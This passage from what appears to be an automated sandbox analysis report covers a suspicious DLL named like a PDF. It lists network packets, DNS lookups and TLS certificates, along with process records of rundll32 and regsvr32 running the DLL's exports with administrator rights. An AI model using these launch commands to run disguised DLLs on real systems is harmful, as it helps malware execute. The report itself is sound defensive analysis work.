Apr 7, 2021 11:56:42.767297029 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767311096 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767349005 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767395973 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767435074 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767450094 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767487049 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767505884 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767543077 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767565012 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767599106 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767620087 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767656088 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767676115 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767714024 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767740011 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767776012 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767781973 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767818928 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767832041 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767868996 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767879963 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767915010 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767929077 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767963886 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767976999 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.768013000 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.768026114 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.768063068 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.768074036 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.768110037 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.768122911 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.768160105 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.768171072 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.768204927 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.768248081 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.768284082 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.768290997 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.768326044 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:44.273403883 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:44.287785053 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:44.287900925 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:00.700949907 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:00.700972080 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:00.701208115 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:00.701252937 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:02.923803091 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:02.924092054 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:02.924134016 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:02.924192905 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:02.924238920 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:02.925142050 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:02.935916901 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:02.936849117 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:04.293745995 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:04.293790102 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:04.293906927 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:04.295483112 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:04.466826916 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:04.479844093 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:50.631952047 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:50.632188082 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:57:50.632188082 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:57:50.643745899 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:50.643800020 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:57:50.643842936 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:50.643883944 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:57:50.644879103 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:57:50.644951105 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:57:50.650573015 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:57:50.650711060 CEST	49731	443	192.168.2.3	104.20.185.68

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 11:55:49.975831985 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:55:49.989034891 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 7, 2021 11:55:50.820818901 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:55:50.835021019 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 7, 2021 11:55:58.531917095 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:55:58.551115036 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:01.149965048 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:01.168848038 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:01.530117035 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:01.543226957 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:02.369770050 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:02.404876947 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:02.451232910 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:02.470580101 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:08.321013927 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:08.354264021 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:09.814338923 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:09.832680941 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:10.967475891 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:10.981933117 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:22.567609072 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:22.586390018 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:30.173453093 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:30.186897039 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:30.468415976 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:30.480263948 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:31.300429106 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:31.316719055 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:31.844945908 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:31.859483004 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:32.452394962 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:32.464927912 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:33.161106110 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:33.174107075 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:34.605015993 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:34.618359089 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:35.848810911 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:35.862472057 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:38.609014034 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:38.623483896 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:38.719456911 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:38.733802080 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:40.245008945 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:40.256726980 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:46.979607105 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:47.021951914 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:49.463493109 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:49.481597900 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:51.323148966 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:51.336256027 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:51.841003895 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:51.874814987 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 7, 2021 11:56:53.414392948 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:56:53.427794933 CEST	53	50713	8.8.8.8	192.168.2.3
Apr 7, 2021 11:57:18.917296886 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:57:18.931657076 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 7, 2021 11:57:20.424465895 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:57:20.436359882 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 7, 2021 11:57:21.593230009 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:57:21.606240988 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 7, 2021 11:57:23.765571117 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:57:23.822572947 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 7, 2021 11:57:27.937416077 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:57:27.952300072 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 7, 2021 11:57:54.428386927 CEST	58987	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:57:54.440690041 CEST	53	58987	8.8.8.8	192.168.2.3
Apr 7, 2021 11:58:24.482402086 CEST	56579	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:58:24.495800972 CEST	53	56579	8.8.8.8	192.168.2.3
Apr 7, 2021 11:58:25.204890966 CEST	60633	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:58:25.218281984 CEST	53	60633	8.8.8.8	192.168.2.3
Apr 7, 2021 11:58:26.223150969 CEST	61292	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:58:26.263695002 CEST	53	61292	8.8.8.8	192.168.2.3
Apr 7, 2021 11:58:26.977579117 CEST	63619	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:58:26.991636992 CEST	53	63619	8.8.8.8	192.168.2.3
Apr 7, 2021 11:58:30.899877071 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 7, 2021 11:58:30.912967920 CEST	53	64938	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 7, 2021 11:56:01.530117035 CEST	192.168.2.3	8.8.8.8	0x8087	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:08.321013927 CEST	192.168.2.3	8.8.8.8	0x775d	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:09.814338923 CEST	192.168.2.3	8.8.8.8	0xcf94	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:10.967475891 CEST	192.168.2.3	8.8.8.8	0x697b	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:22.567609072 CEST	192.168.2.3	8.8.8.8	0x5b7	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:38.719456911 CEST	192.168.2.3	8.8.8.8	0x2ee6	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 7, 2021 11:56:01.543226957 CEST	8.8.8.8	192.168.2.3	0x8087	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Apr 7, 2021 11:56:08.354264021 CEST	8.8.8.8	192.168.2.3	0x775d	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Apr 7, 2021 11:56:09.832680941 CEST	8.8.8.8	192.168.2.3	0xcf94	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:09.832680941 CEST	8.8.8.8	192.168.2.3	0xcf94	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:10.981933117 CEST	8.8.8.8	192.168.2.3	0x697b	No error (0)	contextual.media.net		2.22.155.145	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:22.586390018 CEST	8.8.8.8	192.168.2.3	0x5b7	No error (0)	lg3.media.net		2.22.155.145	A (IP address)	IN (0x0001)
Apr 7, 2021 11:56:38.733802080 CEST	8.8.8.8	192.168.2.3	0x2ee6	No error (0)	hblg.media.net		2.22.155.145	A (IP address)	IN (0x0001)
Apr 7, 2021 11:58:26.263695002 CEST	8.8.8.8	192.168.2.3	0x4a1d	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 7, 2021 11:56:10.112715006 CEST	104.20.185.68	443	192.168.2.3	49730	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:10.112715006 CEST	104.20.185.68	443	192.168.2.3	49730	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:10.120224953 CEST	104.20.185.68	443	192.168.2.3	49731	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:10.120224953 CEST	104.20.185.68	443	192.168.2.3	49731	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:13.844213963 CEST	2.22.155.145	443	192.168.2.3	49732	CN=*.media.net, OU=HQ, O=MEDIA.NET ADVERTISING FZ LLC, L=Dubai, ST=Dubai, C=AE CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 25 01:00:00 CET 2020 Fri Mar 08 13:00:00 CET 2013	Wed May 26 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:13.844213963 CEST	2.22.155.145	443	192.168.2.3	49732	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:13.844393969 CEST	2.22.155.145	443	192.168.2.3	49733	CN=*.media.net, OU=HQ, O=MEDIA.NET ADVERTISING FZ LLC, L=Dubai, ST=Dubai, C=AE CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 25 01:00:00 CET 2020 Fri Mar 08 13:00:00 CET 2013	Wed May 26 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:13.844393969 CEST	2.22.155.145	443	192.168.2.3	49733	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:22.623658895 CEST	2.22.155.145	443	192.168.2.3	49734	CN=*.media.net, OU=HQ, O=MEDIA.NET ADVERTISING FZ LLC, L=Dubai, ST=Dubai, C=AE CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 25 01:00:00 CET 2020 Fri Mar 08 13:00:00 CET 2013	Wed May 26 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:22.623658895 CEST	2.22.155.145	443	192.168.2.3	49734	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:22.624429941 CEST	2.22.155.145	443	192.168.2.3	49735	CN=*.media.net, OU=HQ, O=MEDIA.NET ADVERTISING FZ LLC, L=Dubai, ST=Dubai, C=AE CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 25 01:00:00 CET 2020 Fri Mar 08 13:00:00 CET 2013	Wed May 26 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:22.624429941 CEST	2.22.155.145	443	192.168.2.3	49735	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:38.903198004 CEST	2.22.155.145	443	192.168.2.3	49738	CN=*.media.net, OU=HQ, O=MEDIA.NET ADVERTISING FZ LLC, L=Dubai, ST=Dubai, C=AE CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 25 01:00:00 CET 2020 Fri Mar 08 13:00:00 CET 2013	Wed May 26 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:38.903198004 CEST	2.22.155.145	443	192.168.2.3	49738	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:38.903387070 CEST	2.22.155.145	443	192.168.2.3	49739	CN=*.media.net, OU=HQ, O=MEDIA.NET ADVERTISING FZ LLC, L=Dubai, ST=Dubai, C=AE CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 25 01:00:00 CET 2020 Fri Mar 08 13:00:00 CET 2013	Wed May 26 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 7, 2021 11:56:38.903387070 CEST	2.22.155.145	443	192.168.2.3	49739	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6092 Parent PID: 5708

General

Start time:	11:55:54
Start date:	07/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll'
Imagebase:	0xf70000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4812 Parent PID: 6092

General

Start time:	11:55:55
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 4792 Parent PID: 6092

General

Start time:	11:55:55
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll
Imagebase:	0xb90000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5520 Parent PID: 4812

General

Start time:	11:55:55
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1
Imagebase:	0xa30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2436 Parent PID: 6092

General

Start time:	11:55:56
Start date:	07/04/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff6db400000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4804 Parent PID: 6092

General

Start time:	11:55:56
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Charthea1
Imagebase:	0xa30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4564 Parent PID: 2436

General

Start time:	11:55:57
Start date:	07/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2436 CREDAT:17410 /prefetch:2
Imagebase:	0x830000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6176 Parent PID: 6092

General

Start time:	11:55:59
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Claimdecide
Imagebase:	0xa30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6268 Parent PID: 6092

General

Start time:	11:56:04
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
